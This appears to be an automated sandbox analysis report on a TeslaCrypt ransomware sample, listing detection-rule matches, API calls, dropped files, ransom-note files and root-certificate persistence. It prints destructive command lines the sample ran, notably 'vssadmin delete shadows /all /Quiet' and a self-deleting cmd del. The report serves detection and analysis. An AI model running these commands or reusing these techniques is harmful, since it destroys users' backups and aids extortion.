Source: 0.2.0t8amSU3vd.exe.520000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 13.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 2.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\0t8amSU3vd.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMemory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041ED00 SHGetFolderPathW,GetModuleHandleW,RtlGetVersion,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcessId,LoadIconW,RegisterClassExW,VirtualProtect,InterlockedExchange,CreateWindowExW,GetStartupInfoW,ExpandEnvironmentStringsW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,GetMessageW,TranslateMessage,GetMessageW,TranslateMessage,DispatchMessageW,UnregisterClassW,ExitProcess,0_2_0041ED00
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041EA80 GetProcessHeap,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetSystemDirectoryA,_strcpy_s,GetProcessHeap,HeapFree,LoadLibraryExA,GetProcAddress,FreeLibrary,GetProcessHeap,HeapFree,0_2_0041EA80
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041ED00 SHGetFolderPathW,GetModuleHandleW,RtlGetVersion,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcessId,LoadIconW,RegisterClassExW,VirtualProtect,InterlockedExchange,CreateWindowExW,GetStartupInfoW,ExpandEnvironmentStringsW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,GetMessageW,TranslateMessage,GetMessageW,TranslateMessage,DispatchMessageW,UnregisterClassW,ExitProcess,2_2_0041ED00
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041EA80 GetProcessHeap,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetSystemDirectoryA,_strcpy_s,GetProcessHeap,HeapFree,LoadLibraryExA,GetProcAddress,FreeLibrary,GetProcessHeap,HeapFree,2_2_0041EA80
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: String function: 004299A0 appears 31 times
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: String function: 004299A0 appears 31 times
Source: 0t8amSU3vd.exe, 00000000.00000002.345325863.00000000002AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exe, 00000000.00000003.344863487.00000000002AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exe, 00000000.00000000.343903709.0000000000518000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMacrobiotic.exe4 vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exeBinary or memory string: OriginalFilenameMacrobiotic.exe4 vs 0t8amSU3vd.exe
Source: 0t8amSU3vd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.svcmtr.exe.2c0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.svcmtr.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.svcmtr.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.0t8amSU3vd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.svcmtr.exe.2c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.0t8amSU3vd.exe.520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.0t8amSU3vd.exe.520000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
Source: 0t8amSU3vd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svcmtr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@26/1205@15/13
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041E810 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_0041E810
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041E810 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,2_2_0041E810
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_0041B2C0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041D4D0 LoadStringW,LoadStringW,LoadStringW,CoInitializeEx,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,CoCreateInstance,CoCreateInstance,ExitProcess,_memset,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,CreateMutexW,GetLastError,_memset,GetVersionExW,CreateThread,CreateThread,_memset,__wfopen_s,_fprintf,CreateThread,CreateThread,CreateThread,SetThreadPriority,WaitForSingleObject,WaitForSingleObject,_memset,ShellExecuteW,ShellExecuteW,ShellExecuteW,ShellExecuteW,CreateThread,WaitForSingleObject,CreateThread,WaitForSingleObject,0_2_0041D4D0
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile created: C:\Users\user\AppData\Roaming\svcmtr.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeMutant created: \Sessions\1\BaseNamedObjects\435-3435-4546
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Low\restore_files_gpmus.txtJump to behavior
Source: C:\Windows\System32\vssadmin.exeConsole Write: No items found that satisfy the query.
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: scan0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: SCAN0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: KERNEL320_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: \Recovery_File_0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: .txt0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: 435-3435-45460_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: %s%s%s%S0_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCommand line argument: open0_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: scan2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: SCAN2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: KERNEL322_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: \Recovery_File_2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: .txt2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: 435-3435-45462_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: E722D94C1CAC34B2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: %s%s%s%S2_2_0041D4D0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCommand line argument: open2_2_0041D4D0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 0t8amSU3vd.exeReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile read: C:\Users\user\Desktop\0t8amSU3vd.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\0t8amSU3vd.exe "C:\Users\user\Desktop\0t8amSU3vd.exe"
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe C:\Users\user\AppData\Roaming\svcmtr.exe
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe "C:\Users\user\AppData\Roaming\svcmtr.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe "C:\Users\user\AppData\Roaming\svcmtr.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe "C:\Users\user\AppData\Roaming\svcmtr.exe"
Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Users\user\AppData\Roaming\svcmtr.exe C:\Users\user\AppData\Roaming\svcmtr.exeJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NULJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: credssp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: msvfw32.dll
Source: C:\Windows\System32\notepad.exeSection loaded: version.dll
Source: C:\Windows\System32\notepad.exeSection loaded: dwmapi.dll
Source: C:\Users\user\Desktop\0t8amSU3vd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_2696_1526441409

Data Obfuscation

Source: C:\Users\user\Desktop\0t8amSU3vd.exeUnpacked PE file: 0.2.0t8amSU3vd.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 2.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 11.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 12.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 13.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042CCB4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042CCB4
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004299E5 push ecx; ret 0_2_004299F8
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004299E5 push ecx; ret 2_2_004299F8
Source: 0t8amSU3vd.exeStatic PE information: section name: .text entropy: 7.771301677112809
Source: svcmtr.exe.0.drStatic PE information: section name: .text entropy: 7.771301677112809

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile created: C:\Users\user\AppData\Roaming\svcmtr.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\restore_files_gpmus.txtJump to behavior
